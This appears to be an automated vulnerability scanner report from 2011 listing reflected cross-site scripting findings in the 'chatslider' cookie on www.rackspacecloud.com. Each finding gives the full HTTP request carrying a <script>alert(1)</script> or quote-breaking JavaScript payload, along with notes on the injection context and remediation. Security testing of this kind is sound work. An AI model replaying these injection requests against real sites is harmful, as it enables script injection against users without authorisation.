Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/files HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1289e"><script>alert(1)</script>7b1f68a0f4a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9af"%3balert(1)//fb201e2e75e was submitted in the chatslider cookie. This input was echoed as ba9af";alert(1)//fb201e2e75e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/files/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dba9af"%3balert(1)//fb201e2e75e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989fe"><script>alert(1)</script>aee80dd4db4 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/files/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D989fe"><script>alert(1)</script>aee80dd4db4; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551a2"%3balert(1)//73cfcc147a was submitted in the chatslider cookie. This input was echoed as 551a2";alert(1)//73cfcc147a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/servers HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D551a2"%3balert(1)//73cfcc147a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6118d"><script>alert(1)</script>330551e35d2 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/servers HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D6118d"><script>alert(1)</script>330551e35d2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1213b"><script>alert(1)</script>044dc60872 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/servers/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1213b"><script>alert(1)</script>044dc60872; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae02"%3balert(1)//c5c67c7b5f4 was submitted in the chatslider cookie. This input was echoed as aae02";alert(1)//c5c67c7b5f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/servers/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Daae02"%3balert(1)//c5c67c7b5f4; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 42990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10bff"%3balert(1)//1a2649babf1 was submitted in the chatslider cookie. This input was echoed as 10bff";alert(1)//1a2649babf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/sites HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D10bff"%3balert(1)//1a2649babf1; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f254c"><script>alert(1)</script>fcc008fa5fd was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/sites HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Df254c"><script>alert(1)</script>fcc008fa5fd; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e0e"><script>alert(1)</script>af147ed8d3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/sites/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D62e0e"><script>alert(1)</script>af147ed8d3f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3966"%3balert(1)//00978718dd5 was submitted in the chatslider cookie. This input was echoed as f3966";alert(1)//00978718dd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/sites/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Df3966"%3balert(1)//00978718dd5; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 399ee"%3balert(1)//d76664a1db3 was submitted in the chatslider cookie. This input was echoed as 399ee";alert(1)//d76664a1db3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D399ee"%3balert(1)//d76664a1db3; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 79910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b0b"><script>alert(1)</script>6254d0a4cbb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
